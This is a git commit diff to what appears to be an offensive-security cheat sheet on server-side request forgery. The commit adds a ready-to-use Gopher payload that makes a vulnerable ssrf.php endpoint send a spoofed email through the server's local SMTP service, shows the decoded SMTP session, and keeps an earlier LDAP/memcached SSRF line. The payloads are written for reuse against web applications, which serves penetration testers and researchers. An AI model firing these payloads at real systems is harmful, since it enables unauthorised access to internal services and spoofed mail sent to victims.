SSRF - Gopher Protocol
Swissky
parent
1ca215d5d7
commit
e7cb8a2ce1
|
|
@ -94,6 +94,26 @@ Ldap://
|
|||
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
|
||||
```
|
||||
|
||||
Gopher://
|
||||
```
|
||||
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
|
||||
|
||||
will make a request like
|
||||
HELO localhost
|
||||
MAIL FROM:<hacker@site.com>
|
||||
RCPT TO:<victim@site.com>
|
||||
DATA
|
||||
From: [Hacker] <hacker@site.com>
|
||||
To: <victime@site.com>
|
||||
Date: Tue, 15 Sep 2017 17:20:26 -0400
|
||||
Subject: Ah Ah AH
|
||||
|
||||
You didn't say the magic word !
|
||||
|
||||
|
||||
.
|
||||
QUIT
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
||||
|
|
@ -101,3 +121,4 @@ ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
|
|||
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
|
||||
* [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
|
||||
* [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
|
||||
* [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
|
||||
|
|
|
|||
Loading…
Reference in New Issue